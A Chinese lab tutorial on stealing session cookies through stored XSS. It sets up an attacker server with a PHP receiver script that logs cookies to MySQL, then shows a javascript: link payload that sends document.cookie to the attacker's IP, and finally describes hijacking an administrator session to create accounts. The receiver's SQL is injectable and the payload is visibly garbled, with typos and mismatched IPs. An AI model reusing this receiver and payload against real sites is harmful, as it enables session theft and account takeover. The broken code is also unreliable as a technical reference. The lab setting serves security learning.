04-xss获取cookie实验

二、开发XSS服务器端

1、确认实验环境

攻击者服务器:192.168.74.134,将获取到cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。

正常Web服务器:192.168.74.133,用于正常的用户访问的目标站点,用户可以在上面阅读或者发表文章。

用户浏览器:本机,Windows环境下,使用chrome浏览器

攻击者浏览器:本机,Windows环境下,使用Firefox浏览器

2、134服务器上创建一张表xssdata

3、在攻击者的服务器中建立文件xss.php

php 复制代码
<?php
    $ipadder = $_SERVER['REMOTE_ADDR'];
    $url = $_GET['url'];
    $cookie = $_GET['cookie'];
    
    $conn = new mysqli('127.0.0.1','root','root','learn') or die('数据库连接不成功.');
    $conn->set_charset('utf-8');
    $sql = "insert into xssdata(ipadder,url,cookie,createtime) values('$ipaddr','$url','$cookie',now())";
    $conn->query($sql);
    
    //echo "<script>history.back()</script>"  让浏览器倒退
    
?>

攻击者在回帖中输入文章内容,并加入JavaScript开始进行xss攻击,

当用户打开回帖会等到以下:

三、实现xss攻击

1.在页面中注入代码

php 复制代码
PHP后台需要将 + 号处理为%2B ,将&处理为  %26

<a href=\'javascript:localhost.href="http://192.168.112.183/xsssrecv.php?
url="%2Blocation.href%2B"%26cookie="%2Bocument.cookie\'><img src="http://192.168.112.83/dateme.gif"/>'"
"'></a>

2、获取Cookie后执行

在攻击者的服务器中会cookie的表

3、获取管理员 Cookie

用户向管理员举报有问题的页面,管理员前去访问,攻击者则直接获取到了管理员的cookie。

之后利用管理员的cookie直接登录到网站。但是只有几分钟的时间进行操作,期间可以查看数据库,建立用户,

也可以新建管理员,

相关推荐
LYFlied5 小时前
EVMbench解读:AI Agent如何检测、修复并利用智能合约漏洞
人工智能·网络安全·openai·智能合约·ai agent·evm·智能合约区块链
Hiyajo pray10 小时前
属性sdn隐私保护分析
网络安全
Hiyajo pray12 小时前
属性sdn的隐私保护策略(1)
网络安全
HackTwoHub12 小时前
某单位 CMS 完整渗透链、SQL 注入→后台拿权→绕过宝塔 Waf 上线 shell
数据库·人工智能·sql·安全·网络安全·系统安全·安全架构
杭州默安科技13 小时前
从告警到多防火墙联动封禁:智能体与XDR的自动化响应实践
人工智能·网络安全
云栖梦泽在14 小时前
跨境电商账号频繁验证怎么办?从公网 IP、ASN、浏览器环境到登录稳定性排查
网络·网络协议·tcp/ip·网络安全·性能优化
磐时信息技术2 天前
GB 44495/44496正式施行:智能网联汽车信息安全与软件升级进入强制合规阶段
网络安全·信息安全·汽车·gb44495·gb44496
被克制了2 天前
安全协议设计与分析(2)
网络安全·密码学·安全协议
云水一下2 天前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型
Chockmans3 天前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897